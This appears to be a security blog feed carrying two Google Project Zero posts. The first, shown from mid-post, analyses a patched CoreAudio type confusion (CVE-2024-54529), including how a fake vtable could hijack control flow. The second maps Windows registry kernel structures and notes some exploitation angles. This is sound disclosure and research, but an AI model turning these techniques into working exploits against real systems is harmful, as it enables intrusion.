      v7 = (HALS_ObjectMap *)HALS_ObjectMap::CopyObjectByObjectID((HALS_ObjectMap *)v3);
      v8 = v7;
      if ( !v7 )
      {
        v13 = __cxa_allocate_exception(0x10uLL);
        *(_QWORD *)v13 = &unk_7FF850E85518;
        v13[2] = 560947818;
        __cxa_throw(v13, (struct type_info *)&`typeinfo for'CAException, CAException::~CAException);
      }

    An Intriguing Crash

    Whenever my fuzzer produced a crash, I always took the time to fully understand its root cause. Often, the crashes were not security relevant (e.g., a NULL dereference), but fully understanding the reason behind each crash helped me better understand the target and surface invalid assumptions I was making in my fuzzing harness. Eventually, when I did identify security-relevant crashes, I had a good understanding of the context surrounding them.

    The first indication from my fuzzer that a vulnerability might exist was a memory access violation during an indirect call instruction, where the target address was calculated as an offset from the rax register. As shown in the following backtrace, the crash occurred shallowly within the _XIOContext_Fetch_Workgroup_Port Mach message handler.

    A debugger (lldb) output showing a crash in CoreAudio. The stop reason is EXC_BAD_ACCESS (code=EXC_I386_GPFLT). The crashing instruction is a "call qword ptr [rax + 0x168]" within CoreAudio _XIOContext_Fetch_Workgroup_Port. A backtrace (bt) shows the call stack leading to the crash.

    Further investigating the context of the crash in IDA, I noticed that the rax register triggering the invalid memory access was directly derived from a call to the HALS_ObjectMap::CopyObjectByObjectID function.

    A flowchart of disassembled code showing execution paths. One block includes calls to HALS_Client::EvaluateSandboxAllowsMicAccess and HALS_ObjectMap::CopyObjectByID. Subsequent blocks show calls to HALS_ObjectMap::ReleaseObject if certain conditions are met or branch to a different location loc_7FF813A5A928.

    Specifically, it attempted the following:

    1. Fetch a HALS_Object from the Object Map based on an ID provided in the Mach message
    2. Dereference the address a1 at offset 0x68 of the HALS_Object
    3. Dereference the address a2 at offset 0x0 of a1
    4. Call the function pointer at offset 0x168 of a2

    What Went Wrong?

    The operations leading to the crash indicated that, at offset 0x68 of the HALS_Object it fetched, the code expected a pointer to an object with a vtable. The code would then look up a function within the vtable, which would presumably retrieve the object’s “workgroup port.”

    When the fetched object was of type ioct (IOContext), everything functioned as normal. However, the test input my fuzzer generated was causing the function to fetch a HALS_Object of a different type, which led to an invalid function call. The following diagram shows how an attacker able to influence the pointer at offset 0x68 of a HALS_Object might hijack control flow.

    A diagram illustrating a vtable exploit. It shows Expected ioct Object and Expected 2nd Object with their vtables pointing to legitimate functions. It contrasts this with an Actual Object where Attacker-Controlled Memory contains a void fake_vtable that redirects a getPort call, via a Malicious vtable containing void doEvil, ultimately leading to a CALL doEvil instead of the expected function.

    This vulnerability class is referred to as a type confusion: the vulnerable code assumes that a retrieved object or struct is of a specific type, but it is possible to provide a different one. The object’s memory layout might be completely different, meaning memory accesses and vtable lookups might occur in the wrong place, or even out of bounds. Type confusion vulnerabilities can be extremely powerful because they often lend themselves to reliable exploits.

    Affected Functions

    The _XIOContext_Fetch_Workgroup_Port Mach message handler wasn’t the only function that assumed it was dealing with an ioct object without checking the type. The table below shows several other message handlers that suffered from the same issue:

    Mach Message Handler                     Affected Routine
    _XIOContext_Fetch_Workgroup_Port         _XIOContext_Fetch_Workgroup_Port
    _XIOContext_Start                        ___ZNK14HALS_IOContext22HasEnabledInputStreamsEv_block_invoke
    _XIOContext_StartAtTime                  ___ZNK14HALS_IOContext16GetNumberStreamsEb_block_invoke
    _XIOContext_Start_With_WorkInterval      ___ZNK14HALS_IOContext22HasEnabledInputStreamsEv_block_invoke
    _XIOContext_SetClientControlPort         _XIOContext_SetClientControlPort
    _XIOContext_Stop                         _XIOContext_Stop

    Apple did perform proper type checking in some of the Mach message handlers. For example, the _XIOContext_PauseIO message handler, shown below, calls a function that checks whether the fetched object is of type ioct before using it. It is not clear why these checks were implemented in some areas but not others.

    A snippet of disassembled code. Key instructions include calls to HALC_ProxyObjectMap_CopyObjectByID, HALB_Info::IsStandardClass, and HALC_ProxyObjectMap::RetainObject. An 'ioct' string is being compared with a memory location.

    The impact of this vulnerability can range from an information leak to control flow hijacking. In this case, since the vulnerable code is performing a function call, an attacker could potentially control the data at the offset read during the type confusion, allowing them to control the function pointer and redirect execution. Alternatively, if the attacker can provide an object smaller than 0x68 bytes, an out-of-bounds read would be possible, paving the way for further exploitation opportunities such as memory corruption or arbitrary code execution.

    Creating a Proof of Concept

    Because my fuzzing harness was connected downstream in the Mach message handling process, it was important to build an end-to-end proof of concept that used the mach_msg API to send a Mach message to the vulnerable message handler within coreaudiod. Otherwise, I risked chasing a false positive, as in the earlier mig_deallocate crash, where we thought we had a bug but were actually just bypassing security checks the kernel would normally perform.

    In this case, however, the bug was triggerable using the mach_msg API, making it a legitimate opportunity for use as a sandbox escape. The proof-of-concept code I put together for triggering this issue on MacOS Sequoia 15.0.1 can be found here.

    It’s worth noting that code running on Apple Silicon uses Pointer Authentication Codes (PACs), which could make exploitation more difficult. In order to exploit this bug through an invalid vtable call, an attacker would need the ability to sign pointers, which would be possible if the attacker gained native code execution in an Apple-signed process. However, I only analyzed and tested this issue on x86-64 versions of MacOS.

    How Apple Fixed the Issue

    I reported this type confusion vulnerability to Apple on October 9, 2024. It was fixed on December 11, 2024, assigned CVE-2024-54529, and a patch was introduced in MacOS Sequoia 15.2, Sonoma 14.7.2, and Ventura 13.7.2. Interestingly, Apple mentions that the vulnerability allowed for code execution with kernel privileges. That part interested me, since as far as I could tell the execution was only possible as the _coreaudiod group, which was not equivalent to kernel privileges.

    A screenshot of a security advisory for an Audio vulnerability in macOS Sonoma. The impact states "An app may be able to execute arbitrary code with kernel privileges." The description notes "A logic issue was addressed with improved checks" and credits CVE-2024-54529 to Dillon Franke working with Google Project Zero.

    Apple’s fix was simple: since each HALS Object contains information about its type, the patch adds a check within the affected functions to ensure the fetched object is of type ioct before dereferencing the object and performing a function call.

    A snippet of disassembled code with annotations. Several cmp compare instructions are highlighted with Type Check pointing to comparisons with the string ioct. Further down, a call qword ptr rax+158h instruction is highlighted with Object dereference/function call, indicating a potential point of interest for a vulnerability if the object or function pointer can be controlled.

    You might have noticed that the offset dereferenced within the HALS Object is 0x70 in the updated version, but was 0x68 in the vulnerable version. Often, such struct modifications are not security relevant, but simply reflect other bug fixes or added features.

    Recommendations

    To prevent similar type confusion vulnerabilities in the future, Apple should consider modifying the CopyObjectByObjectID function (or any others that make assumptions about an object’s type) to include a type check. This could be achieved by passing the expected object type as an argument and verifying the type of the fetched object before returning it. This approach is similar to how deserialization functions often include a template parameter to ensure type safety.

    Conclusion

    This blog post described my journey into the world of MacOS vulnerability research and fuzzing. I hope I have shown how a knowledge-driven fuzzing approach enables rapid prototyping and iteration, a deep understanding of the target, and high-impact bugs.

    In my next post, I will perform a detailed walkthrough of my experience attempting to exploit CVE-2024-54529.


    The Windows Registry Adventure #6: Kernel-mode objects

    16 de Abril de 2025, 18:19

    Posted by Mateusz Jurczyk, Google Project Zero

    Welcome back to the Windows Registry Adventure! In the previous installment of the series, we took a deep look into the internals of the regf hive format. Understanding this foundational aspect of the registry is crucial, as it illuminates the design principles behind the mechanism, as well as its inherent strengths and weaknesses. The data stored within the regf file represents the definitive state of the hive. Knowing how to parse this data is sufficient for handling static files encoded in this format, such as when writing a custom regf parser to inspect hives extracted from a hard drive. However, for those interested in how regf files are managed by Windows at runtime, rather than just their behavior in isolation, there's a whole other dimension to explore: the multitude of kernel-mode objects allocated and maintained throughout the lifecycle of an active hive. These auxiliary objects are essential for several reasons:

    • To track all currently loaded hives, their properties (e.g., load flags), their memory mappings, and the relationships between them (especially for delta hives overlaid on top of each other).
    • To synchronize access to keys and hives within the multithreaded Windows environment.
    • To cache hive information for faster access compared to direct memory mapping lookups.
    • To integrate the registry with the NT Object Manager and support standard operations (opening/closing handles, setting/querying security descriptors, enforcing access checks, etc.).
    • To manage the state of pending transactions before they are fully committed to the underlying hive.

    To address these diverse requirements, the Windows kernel employs numerous interconnected structures. In this post, we will examine some of the most critical ones, how they function, and how they can be effectively enumerated and inspected using WinDbg. It's important to note that Microsoft provides official definitions only for some registry-related structures through PDB symbols for ntoskrnl.exe. In many cases, I had to reverse-engineer the relevant code to recover structure layouts, as well as infer the types and names of particular fields and enums. Throughout this write-up, I will clearly indicate whether each structure definition is official or reverse-engineered. If you spot any inaccuracies, please let me know. The definitions presented here are primarily derived from Windows Server 2019 with the March 2022 patches (kernel build 10.0.17763.2686), which was the kernel version used for the majority of my registry code analysis. However, over 99% of registry structure definitions appear to be identical between this version and the latest Windows 11, making the information directly applicable to the latest systems as well.

    Hive structures

    Given that hives are the most intricate type of registry object, it's not surprising that their kernel-mode descriptors are equally complex and lengthy. The primary hive descriptor structure in Windows, known as _CMHIVE, spans a substantial 0x12F8 bytes – exceeding 4 KiB, the standard memory page size on x86-family architectures. Contained within _CMHIVE, at offset 0, is another structure of type _HHIVE, which occupies 0x600 bytes, as depicted in the diagram below:

    Diagram depicting the layout of the Windows Registry kernel structure _CMHIVE. It shows the overall _CMHIVE block, marked with a total size of 0x12F8 bytes. Within this block, the first part, from offset 0x0 to 0x600, is labeled as the _HHIVE structure. The remaining portion, from offset 0x600 to 0x12F8, is labeled "Rest of _CMHIVE".

    This relationship mirrors that of other common Windows object pairs, such as _EPROCESS / _KPROCESS and _ETHREAD / _KTHREAD. Because _HHIVE is always allocated as a component of the larger _CMHIVE structure, their pointer types are effectively interchangeable. If you encounter a decompiled access using a _HHIVE* pointer that extends beyond the size of the structure, it almost certainly indicates a reference to a field within the encompassing _CMHIVE object.

    But why are two distinct structures dedicated to representing a single registry hive? While technically not required, this separation likely serves to delineate fields associated with different abstraction layers of the hive. Specifically:

    • _HHIVE manages the low-level aspects of the hive, including the hive header, bins, and cells, as well as in-memory mappings and synchronization state with its on-disk counterpart (e.g., dirty sectors).
    • _CMHIVE handles more abstract information about the hive, such as the cache of security descriptors, pointers to high-level kernel objects like the root Key Control Block (KCB), and the associated transaction resource manager (_CM_RM structure).

    The next subsections will provide a deeper look into the responsibilities and inner workings of these two structures.

    _HHIVE structure overview

    The primary role of the _HHIVE structure is to manage the memory-related state of a hive. This allows higher-level registry code to perform operations such as allocating, freeing, and marking cells as "dirty" without needing to handle the low-level implementation details. The _HHIVE structure comprises 49 top-level members, most of which will be described in larger groups below:

    0: kd> dt _HHIVE
    nt!_HHIVE
       +0x000 Signature        : Uint4B
       +0x008 GetCellRoutine   : Ptr64     _CELL_DATA*
       +0x010 ReleaseCellRoutine : Ptr64     void
       +0x018 Allocate         : Ptr64     void*
       +0x020 Free             : Ptr64     void
       +0x028 FileWrite        : Ptr64     long
       +0x030 FileRead         : Ptr64     long
       +0x038 HiveLoadFailure  : Ptr64 Void
       +0x040 BaseBlock        : Ptr64 _HBASE_BLOCK
       +0x048 FlusherLock      : _CMSI_RW_LOCK
       +0x050 WriterLock       : _CMSI_RW_LOCK
       +0x058 DirtyVector      : _RTL_BITMAP
       +0x068 DirtyCount       : Uint4B
       +0x06c DirtyAlloc       : Uint4B
       +0x070 UnreconciledVector : _RTL_BITMAP
       +0x080 UnreconciledCount : Uint4B
       +0x084 BaseBlockAlloc   : Uint4B
       +0x088 Cluster          : Uint4B
       +0x08c Flat             : Pos 0, 1 Bit
       +0x08c ReadOnly         : Pos 1, 1 Bit
       +0x08c Reserved         : Pos 2, 6 Bits
       +0x08d DirtyFlag        : UChar
       +0x090 HvBinHeadersUse  : Uint4B
       +0x094 HvFreeCellsUse   : Uint4B
       +0x098 HvUsedCellsUse   : Uint4B
       +0x09c CmUsedCellsUse   : Uint4B
       +0x0a0 HiveFlags        : Uint4B
       +0x0a4 CurrentLog       : Uint4B
       +0x0a8 CurrentLogSequence : Uint4B
       +0x0ac CurrentLogMinimumSequence : Uint4B
       +0x0b0 CurrentLogOffset : Uint4B
       +0x0b4 MinimumLogSequence : Uint4B
       +0x0b8 LogFileSizeCap   : Uint4B
       +0x0bc LogDataPresent   : [2] UChar
       +0x0be PrimaryFileValid : UChar
       +0x0bf BaseBlockDirty   : UChar
       +0x0c0 LastLogSwapTime  : _LARGE_INTEGER
       +0x0c8 FirstLogFile     : Pos 0, 3 Bits
       +0x0c8 SecondLogFile    : Pos 3, 3 Bits
       +0x0c8 HeaderRecovered  : Pos 6, 1 Bit
       +0x0c8 LegacyRecoveryIndicated : Pos 7, 1 Bit
       +0x0c8 RecoveryInformationReserved : Pos 8, 8 Bits
       +0x0c8 RecoveryInformation : Uint2B
       +0x0ca LogEntriesRecovered : [2] UChar
       +0x0cc RefreshCount     : Uint4B
       +0x0d0 StorageTypeCount : Uint4B
       +0x0d4 Version          : Uint4B
       +0x0d8 ViewMap          : _HVP_VIEW_MAP
       +0x110 Storage          : [2] _DUAL

    Signature

    Equal to 0xBEE0BEE0, it is a unique signature of the _HHIVE / _CMHIVE structures. It may be useful in digital forensics for identifying these structures in raw memory dumps, and is yet another reference to bees in the Windows registry implementation.

    Function pointers

    Next up, there are six function pointers, initialized in HvHiveStartFileBacked and HvHiveStartMemoryBacked, and pointing at internal kernel handlers for the following operations:

    Pointer name         Pointer value                               Operation
    GetCellRoutine       HvpGetCellPaged or HvpGetCellFlat           Translate cell index to virtual address
    ReleaseCellRoutine   HvpReleaseCellPaged or HvpReleaseCellFlat   Release previously translated cell index
    Allocate             CmpAllocate                                 Allocate kernel memory within global registry quota
    Free                 CmpFree                                     Free kernel memory within global registry quota
    FileWrite            CmpFileWrite                                Write data to hive file
    FileRead             CmpFileRead                                 Read data from hive file

    As we can see, these functions provide the basic functionality of operating on kernel memory, cell indexes, and the hive file. In my opinion, the most important of them is GetCellRoutine, whose typical destination, HvpGetCellPaged, performs the cell map walk in order to translate a cell index into the corresponding address within the hive mapping.

    It is natural to think that these function pointers could prove useful for exploitation if an attacker managed to corrupt them through a buffer overflow or a use-after-free condition. That was indeed the case in Windows 10 and earlier, but in Windows 11, these calls are now de-virtualized, and most call sites reference one of HvpGetCellPaged / HvpGetCellFlat and HvpReleaseCellPaged / HvpReleaseCellFlat directly, without referring to the pointers. This is great for security, as it completely eliminates the usefulness of those fields in any offensive scenarios.

    Here's an example of a GetCellRoutine call in Windows 10, disassembled in IDA Pro:

    IDA Pro disassembly view showing assembly code related to the GetCellRoutine call in Windows 10, featuring mov and lea instructions, cross-references to CmSetValueKey, and culminating in a call to __guard_dispatch_icall.

    And the same call in Windows 11:

    IDA Pro disassembly of a GetCellRoutine call implementation in Windows 11. The assembly code shows register setup (mov, lea), a test instruction followed by a conditional jump (jz). Depending on the condition, the code either calls HvlpGetCellFlat and jumps onward, or calls HvlpGetCellPaged. Cross-references to CmSetValueKey are also shown

    Hive load failure information

    This is a pointer to a public _HIVE_LOAD_FAILURE structure, which is passed as the first argument to the SetFailureLocation function every time an error occurs while loading a hive. It can be helpful in tracking which validity checks have failed for a given hive, without having to trace the entire loading process.

    Base block

    A pointer to a copy of the hive header, represented by the _HBASE_BLOCK structure.

    Synchronization locks

    There are two locks with the following purpose:

    • FlusherLock – synchronizes access to the hive between clients changing data inside cells and the flusher thread;
    • WriterLock – synchronizes access to the hive between writers that modify the bin/cell layout.

    They are officially of type _CMSI_RW_LOCK, but they boil down to _EX_PUSH_LOCK, and they are used with standard kernel APIs such as ExAcquirePushLockSharedEx.

    Dirty blocks information

    Between offsets 0x58 and 0x84, _HHIVE stores several data structures representing the state of synchronization between the in-memory and on-disk instances of the hive.

    Hive flags

    First of all, there are two flags at offset 0x8C that indicate if the hive mapping is flat and if the hive is read-only. Secondly, there is a 32-bit HiveFlags member that stores further flags which aren't (as far as I know) included in any public Windows symbols. I have managed to reverse-engineer and infer the meaning of the constants I have observed, resulting in the following enum:

    enum _HV_HIVE_FLAGS
    {
      HIVE_VOLATILE                      = 0x1,
      HIVE_NOLAZYFLUSH                   = 0x2,
      HIVE_PRELOADED                     = 0x10,
      HIVE_IS_UNLOADING                  = 0x20,
      HIVE_COMPLETE_UNLOAD_STARTED       = 0x40,
      HIVE_ALL_REFS_DROPPED              = 0x80,
      HIVE_ON_PRELOADED_LIST             = 0x400,
      HIVE_FILE_READ_ONLY                = 0x8000,
      HIVE_SECTION_BACKED                = 0x20000,
      HIVE_DIFFERENCING                  = 0x80000,
      HIVE_IMMUTABLE                     = 0x100000,
      HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL = 0x800000,
    };


    Below is a one-liner explanation of each flag:

    • HIVE_VOLATILE: the hive exists in memory only; set, e.g., for \Registry and \Registry\Machine\HARDWARE.
    • HIVE_NOLAZYFLUSH: changes to the hive aren't automatically flushed to disk and require a manual flush; set, e.g., for \Registry\Machine\SAM.
    • HIVE_PRELOADED: the hive is one of the default, system ones; set, e.g., for \Registry\Machine\SOFTWARE, \Registry\Machine\SYSTEM, etc.
    • HIVE_IS_UNLOADING: the hive is currently being loaded or unloaded in another thread and shouldn't be accessed before the operation is complete.
    • HIVE_COMPLETE_UNLOAD_STARTED: the unloading process of the hive has started in CmpCompleteUnloadKey.
    • HIVE_ALL_REFS_DROPPED: all references to the hive through KCBs have been dropped.
    • HIVE_ON_PRELOADED_LIST: the hive is linked into a linked-list via the PreloadedHiveList field.
    • HIVE_FILE_READ_ONLY: the underlying hive file is read-only and shouldn't be modified; indicates that the hive was loaded with the REG_OPEN_READ_ONLY flag set.
    • HIVE_SECTION_BACKED: the hive is mapped in memory using section views.
    • HIVE_DIFFERENCING: the hive is a differencing one (version 1.6, loaded under \Registry\WC).
    • HIVE_IMMUTABLE: the hive is immutable and cannot be modified; indicates that it was loaded with the REG_IMMUTABLE flag set.
    • HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL: the kernel always maintains a local copy of every page of the hive, either by locking it in physical memory or creating a private copy through the CoW mechanism.

    Log file information

    Between offsets 0xA4 to 0xCC, there are a number of fields having to do with log file management, i.e. the .LOG1/.LOG2 files accompanying the main hive file on disk.

    Hive version

    The Version field stores the minor version of the hive, which should theoretically be an integer between 3 and 6. However, as mentioned in the previous blog post, it is possible to set it to an arbitrary 32-bit value, either by specifying a major version equal to 0 and any desired minor version, or by enticing the kernel to recover the hive header from a log file, abusing the fact that the HvAnalyzeLogFiles function is more permissive than HvpGetHiveHeader. Nevertheless, I haven't found any security implications of this behavior.

    View map

    The view map holds all the essential information about how the hive is mapped in memory. The specific implementation of registry memory management has evolved considerably over the years, with its details changing between consecutive system versions. In the latest ones, the view map is represented by the top-level _HVP_VIEW_MAP public structure:

    0: kd> dt _HVP_VIEW_MAP
    nt!_HVP_VIEW_MAP
       +0x000 SectionReference : Ptr64 Void
       +0x008 StorageEndFileOffset : Int8B
       +0x010 SectionEndFileOffset : Int8B
       +0x018 ProcessTuple     : Ptr64 _CMSI_PROCESS_TUPLE
       +0x020 Flags            : Uint4B
       +0x028 ViewTree         : _RTL_RB_TREE


    The semantics of its respective fields are as follows:

    • SectionReference: Contains a kernel-mode handle to a section object corresponding to the hive file, created via ZwCreateSection in CmSiCreateSectionForFile.
    • StorageEndFileOffset: Stores the maximum size of the hive that can be represented with file-backed sections at any given time. Initially set to the size of the loaded hive, it can dynamically increase or decrease at runtime for mutable (normal) hives.
    • SectionEndFileOffset: Represents the size of the hive file section at the time of loading. It is never modified past the first initialization in HvpViewMapStart, and seems to be mostly used as a safeguard against extending an immutable hive file beyond its original size.
    • ProcessTuple: A structure of type _CMSI_PROCESS_TUPLE, it identifies the host process of the hive's section views. This field currently always points to the global CmpRegistryProcess object, which corresponds to the dedicated "Registry" process that hosts all hive mappings in the system. However, this field could enable a more fine-grained separation of hive mappings across multiple processes, should Microsoft choose to implement such a feature.
    • Flags: Represents a set of memory management flags relevant to the entire hive. These flags are not publicly documented; however, through reverse engineering, I have determined their purpose to be as follows:
      • VIEW_MAP_HIVE_FILE_IMMUTABLE (0x1): Indicates that the hive has been loaded as immutable, meaning no data is ever saved back to the underlying hive file.
      • VIEW_MAP_MUST_BE_KEPT_LOCAL (0x2): Indicates that all of the hive data must be persistently stored in memory, and not just accessible through file-backed sections. This is likely to protect against double-fetch conditions involving hives loaded from remote network shares.
      • VIEW_MAP_CONTAINS_LOCKED_PAGES (0x4): Indicates that some of the hive's pages are currently locked in physical memory using ZwLockVirtualMemory.
    • ViewTree: This is the root of a view tree structure, which contains the descriptors of each continuous section view mapped in memory.

    Overall, the implementation of low-level hive memory management in Windows is more complex than might initially seem necessary. This complexity arises from the kernel's need to gracefully handle a variety of corner cases and interactions. For example, hives may be loaded as immutable, which indicates that the hive may be operated on in memory, but changes must not be flushed to disk. Simultaneously, the system must support recovering data from .LOG files, including the possibility of extending the hive beyond its original on-disk length. At runtime, it must also be possible to efficiently modify the registry data, as well as shrink and extend it on demand. To further complicate matters, Windows enforces different rules for locking hive pages in memory depending on the backing volume of the file, carefully balancing optimal memory usage and system security guarantees. These and many other factors collectively contribute to the complexity of hive memory management.

    To better understand how the view tree is organized, let's first analyze the general logic of the hive mapping code.

    The hive mapping logic

    The main kernel function responsible for mapping a hive in memory is HvLoadHive. It implements the overall logic and coordinates various sub-routines responsible for performing more specialized tasks, in the following order:

    1. Header Validation: The kernel reads and inspects the hive's header to ascertain its integrity, ensuring that the hive has not been tampered with or corrupted. Relevant function: HvpGetHiveHeader.
    2. Log Analysis: The kernel processes the hive's transaction logs, scrutinizing them to identify any pending changes or inconsistencies that necessitate recovery procedures. Relevant function: HvAnalyzeLogFiles.
    3. Initial Section Mapping: A section object is created based on the hive file, and further segmented into multiple views, each aligned to 4 KiB boundaries and capped at 2 MiB. At this point, the kernel prioritizes the creation of an initial mapping without focusing on the granular layout of individual bins within the hive. Relevant function: HvpViewMapStart.
    4. Cell Map Initialization: The cell map, a component that translates cell indexes to memory addresses, is initialized. Its entries are configured to point to the newly created views. Relevant function: HvpMapHiveImageFromViewMap.
    5. Log Recovery (if required): If the preceding log analysis reveals the need for data recovery, the kernel attempts to restore data integrity. This is the earliest point at which the newly created memory mappings may already be modified and marked as "dirty", indicating that their contents have been altered and require synchronization with the on-disk representation. Relevant function: HvpPerformLogFileRecovery.
    6. Bin Mapping: In this final stage, the kernel establishes definitive memory mappings for each bin within the hive, ensuring that each bin occupies a contiguous region of memory. This process may necessitate creating new views, eliminating existing ones, or adjusting their boundaries to accommodate the specific arrangement of bins. Relevant function: HvpRemapAndEnlistHiveBins.

    Now that we understand the primary components of the loading process, we can examine the internal structure of the section view tree in more detail.

    The view tree

    Let's consider an example hive consisting of three bins of sizes 256 KiB, 2 MiB and 128 KiB, respectively. After step 3 ("Initial Section Mapping"), the section views created by the kernel are as follows:

    Diagram illustrating the initial section view layout for a sample Windows Registry hive. The top section shows the hive layout with Header, Bin 1 (256 KB), Bin 2 (2 MB), and Bin 3 (128 KB). The bottom section shows the corresponding initial kernel mapping: View 1 (1.996 MiB) spanning Bin 1 and most of Bin 2, and View 2 (388 KiB) spanning the end of Bin 2 and Bin 3.

    As we can see, at this point, the kernel doesn't concern itself with bin boundaries or continuity: all it needs to achieve is to make every page of the hive accessible through a section view for log recovery purposes. In simple terms, the way that HvpViewMapStart (or more specifically, HvpViewMapCreateViewsForRegion) works is that it creates as many 2 MiB views as necessary, followed by one last view that covers the remaining part of the file. So in our example, we have the first view that covers bin 1 and the beginning of bin 2, and the second view that covers the trailing part of bin 2 and the entire bin 3. It's important to note that memory continuity is only guaranteed within the scope of a single view, and views 1 and 2 may be mapped at completely different locations in the virtual address space.

    Later in step 6, the system ensures that every bin is mapped as a contiguous block of memory before handing off the hive to the client. This is done by iterating through all the bins, and for every bin that spans more than one view in the current view map, the following operations are performed:

    • If the start and/or the end of the bin fall into the middle of existing views, these views are truncated from either side. Furthermore, if there are any views that are fully covered by the bin, they are freed and removed from the tree.
    • A new, dedicated section view is created for the bin and inserted into the view tree.

    In our hypothetical scenario, the resulting view layout would be as follows:

    Diagram showing a Windows Registry hive layout divided into Header, Bin 1 (256KB), Bin 2 (2MB), and Bin 3 (128KB), with a corresponding section view layout illustrating how View 1, View 2, and View 3 map onto these bins.

    As we can see, the kernel shrinks views 1 and 2, and creates a new view 3 corresponding to bin 2 to fill the gap. The final layout of the binary tree of section view descriptors is illustrated below:

    Diagram showing the final binary tree layout of section view descriptors for a Windows Registry hive. View 3 is the root node, with View 1 as the left child and View 2 as the right child. Each node box displays the specific valid and overall memory address ranges (in hexadecimal) associated with that view descriptor.

    Knowing this, we can finally examine the structure of a single view tree entry. It is not included in the public symbols, but I named it _HVP_VIEW. My reverse-engineered version of its definition is as follows:

    struct _HVP_VIEW
    {
      RTL_BALANCED_NODE Node;
      LARGE_INTEGER ViewStartOffset;
      LARGE_INTEGER ViewEndOffset;
      SSIZE_T ValidStartOffset;
      SSIZE_T ValidEndOffset;
      PBYTE MappingAddress;
      SIZE_T LockedPageCount;
      _HVP_VIEW_PAGE_FLAGS PageFlags[];
    };


    The role of each particular field is documented below:

    • Node: This is the structure used to link all of the entries into a single red-black tree, passed to helper kernel functions such as RtlRbInsertNodeEx and RtlRbRemoveNode.
    • ViewStartOffset and ViewEndOffset: This offset pair specifies the overall byte range covered by the underlying section view object in the hive file. Their difference corresponds to the cumulative length of the red and green boxes in a single row in the diagrams above.
    • ValidStartOffset and ValidEndOffset: This offset pair specifies the valid range of the hive accessible through this view, i.e. the green rectangles in the diagrams. It must always be a subset of the [ViewStartOffset, ViewEndOffset] range, and may dynamically change while re-mapping bins (as just shown in this section), as well as when shrinking and extending the hive.
    • MappingAddress: This is the base address of the section view mapping in memory, as returned by ZwMapViewOfSection. It is valid in the context of the process specified by _HVP_VIEW_MAP.ProcessTuple (currently always the "Registry" process). It covers the entire range between [ViewStartOffset, ViewEndOffset], but only pages between [ValidStartOffset, ValidEndOffset] are accessible, and the rest of the section view is marked as PAGE_NOACCESS.
    • LockedPageCount: Specifies the number of pages locked in virtual memory using ZwLockVirtualMemory within this view.
    • PageFlags: A variable-length array that specifies a set of flags for each memory page in the [ViewStartOffset, ViewEndOffset] range.

    I haven't found any (un)official sources documenting the set of supported page flags, so below is my attempt to name them and explain their meaning:

    • VIEW_PAGE_VALID (0x1): Indicates if the page is valid – true for pages between [ValidStartOffset, ValidEndOffset], false otherwise. If this flag is clear, all other flags are irrelevant/unused. The flag is set when creating section views during hive loading (first the initial ones in HvpViewMapStart, and then the bin-specific ones in HvpRemapAndEnlistHiveBins), and when extending an active hive in HvpViewMapExtendStorage. It is cleared when trimming the existing views in HvpRemapAndEnlistHiveBins to make room for new ones, and when shrinking the hive in HvpViewMapShrinkStorage.
    • VIEW_PAGE_COW_BY_CALLER (0x2): Indicates if the kernel maintains a copy of the page through the copy-on-write (CoW) mechanism, as initiated by a client action, e.g. a registry operation that modified data in a cell and thus resulted in marking the page as dirty. The flag is set when dirtying a hive cell, in HvpViewMapMakeViewRangeCOWByCaller, and cleared when flushing the registry changes to disk, in HvpViewMapMakeViewRangeUnCOWByCaller.
    • VIEW_PAGE_COW_BY_POLICY (0x4): Indicates if the kernel maintains a copy of the page through the CoW mechanism, as required by the policy that all pages of non-local hives (hives loaded from volumes other than the system volume) must always remain in memory. The flag is set in HvpViewMapMakeViewRangeValid, as an alternative way of keeping a local copy of the hive pages in memory (if locking fails, or the caller doesn't want the pages locked); in HvpViewMapMakeViewRangeCOWByCaller, when converting previously locked pages to the "CoW by policy" state; and in HvpMappedViewConvertRegionFromLockedToCOWByPolicy, when lazily converting previously locked pages to the "CoW by policy" state in a thread that runs every 60 seconds (as indicated by CmpLazyLocalizeIntervalInSeconds). It is cleared in HvpViewMapMakeViewRangeUnCOWByPolicy, which currently only ever seems to happen for hives loaded from the system volume, i.e. "\SystemRoot" and "\OSDataRoot", as listed in the global CmpWellKnownVolumeList array.
    • VIEW_PAGE_WRITABLE (0x8): Indicates if the page is currently marked as writable, typically as a result of a modifying operation on the page that hasn't yet been flushed to disk. The flag is set in HvpViewMapMakeViewRangeCOWByCaller, when marking a cell as dirty. It is cleared in HvpViewMapMakeViewRangeUnCOWByCaller, when flushing the hive changes to disk, and in HvpViewMapSealRange, when setting the memory as read-only for miscellaneous reasons (after performing log file recovery, etc.).
    • VIEW_PAGE_LOCKED (0x10): Indicates if the page is currently locked in physical memory. The flag is set in HvpViewMapMakeViewRangeValid if the caller requests page locking, and there is enough space left in the 64 MiB working set of the Registry process; in practice, this boils down to locking the initial 2 MiB hive mappings created in HvpViewMapStart for all app hives and for normal hives outside of the system disk volume. It is cleared whenever the state of the page changes to CoW-by-policy or Invalid, in the following functions: HvpViewMapMakeViewRangeCOWByCaller, HvpMappedViewConvertRegionFromLockedToCOWByPolicy, HvpViewMapMakeViewRangeUnCOWByPolicy and HvpViewMapMakeViewRangeInvalid.

    The semantics of most of the flags are straightforward, but perhaps VIEW_PAGE_COW_BY_POLICY and VIEW_PAGE_LOCKED warrant a slightly longer explanation. The two flags are mutually exclusive, and they represent nearly identical ways to achieve the same goal: ensure that a copy of each hive page remains resident in memory or a pagefile. Under normal circumstances, the kernel could simply create the necessary section views in their default form, and let the memory management subsystem decide how to handle their pages most efficiently. However, one of the guarantees of the registry is that once a hive has been loaded, it must remain operational for as long as it is active in the system. On the other hand, section views have the property that (parts of) their underlying data may be completely evicted by the kernel, and later re-read from the original storage medium such as the hard drive. So, it is possible to imagine a situation where:

    • A hive is loaded from a removable drive (e.g. a CD-ROM or flash drive) or a network share,
    • Due to high memory pressure from other applications, some of the hive pages are evicted from memory,
    • The removable drive with the hive file is ejected from the system,
    • A client subsequently tries to operate on the hive, but parts of it are unavailable and cannot be fetched again from the original source.

    This could cause some significant problems and make the registry code fail in unexpected ways. It would also constitute a security vulnerability: the kernel assumes that once it has opened and sanitized the hive file, its contents remain consistent for as long as the hive is used. This is achieved by opening the file with exclusive access, but if the hive data was ever re-read by the Windows memory manager, a malicious removable drive or an attacker-controlled network share could ignore the exclusivity request and provide different, invalid data on the second read. This would result in a kind of "double fetch" condition and potentially lead to kernel memory corruption.

